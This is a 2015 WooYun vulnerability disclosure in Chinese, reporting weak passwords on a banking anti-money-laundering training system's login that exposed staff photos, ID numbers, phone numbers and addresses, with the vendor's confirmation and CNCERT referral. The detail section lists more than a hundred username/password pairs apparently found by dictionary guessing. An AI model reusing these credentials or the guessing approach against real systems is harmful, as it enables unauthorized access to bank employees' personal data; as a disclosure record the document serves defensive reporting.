当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153122

漏洞标题:银行业反洗钱系统某漏洞致银行职员信息泄露(照片/身份证/手机号/出生日期/工作单位/住址等等)

相关厂商:中国金融业培训系统

漏洞作者: 路人甲

提交时间:2015-11-09 20:08

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-09: 细节已通知厂商并且等待厂商处理中
2015-11-20: 厂商已经确认,细节仅向厂商公开
2015-11-30: 细节向核心白帽子及相关领域专家公开
2015-12-10: 细节向普通白帽子公开
2015-12-20: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

详细说明:

http://**.**.**.**/FxqStudent/Login.aspx

y2.png


lianjing/lianjing
liaoqi/liaoqi
liaoqian/liaoqian
liaoyi/liaoyi
libiao/libiao
libingbing/libingbing
zhangxiuying/zhangxiuying
wangyong/wangyong
lihong/lihong
lidanna/lidanna
lidanyang/lidanyang
lidaoru/lidaoru
lidehu/lidehu
lidemin/lidemin
lidexiong/lidexiong
lidinghe/lidinghe
lidongdong/lidongdong
lidongxiao/lidongxiao
lidujuan/lidujuan
lifangmei/lifangmei
lifengping/lifengping
lifujie/lifujie
ligangwen/ligangwen
liguanghui/liguanghui
liboxi/liboxi
wangyulan/wangyulan
lixiulan/lixiulan
wangxia/wangxia
liuchao/liuchao
zhangfengying/zhangfengying
zhaowei/zhaowei
chenchen/chenchen
wangxiuyun/wangxiuyun
yanglei/yanglei
liujianhua/liujianhua
zhanglijuan/zhanglijuan
sunxiuying/sunxiuying
wangxiuzhen/wangxiuzhen123
111111/111111
1234567/1234567
heather/heather
121212/121212
000000/000000
11111111/11111111
7777777/7777777
112233/112233
777777/777777
88888888/88888888
987654/987654
topgun/topgun
999999/999999
1q2w3e/1q2w3e
1q2w3e4r/1q2w3e4r
101010/101010
1qaz2wsx/1qaz2wsx
212121/212121
testtest/testtest
159753/159753
pppppp/pppppp
q1w2e3r4/q1w2e3r4
12341234/12341234
12121212/12121212
202020/202020
1234qwer/1234qwer
314159/314159
gogogo/gogogo
a1b2c3/a1b2c3
22222222/22222222
66666666/66666666
111222/111222
181818/181818
171717/171717
147258/147258
102030/102030
napoleon/napoleon
1111111/1111111
12344321/12344321
123789/123789
elizabeth/elizabeth
313131/313131
666999/666999
twilight/twilight
a123456/a123456
pass1234/pass1234
989898/989898
012345/012345
alucard/alucard
969696/969696
manman/manman
100000/100000
noelle/noelle
31415926/31415926
090909/090909
katherine/katherine
656565/656565
383838/383838
a1234567/a1234567
222333/222333
123aaa/123aaa
encore/encore
100100/100100
778899/778899
020202/020202
789123/789123
qwqwqw/qwqwqw
868686/868686
larry/larry123
tanker/tanker123
qwaszx/qwaszx123
heyyou/heyyou123


弱口令太多,只跑了我字典的不到1/5

漏洞证明:

y3.png


y4.png


y5.png

修复方案:

url和账号密码求审核帮忙打个码,谢谢!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-11-20 14:35

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,由其后续协调网站管理单位处置。

最新状态:

暂无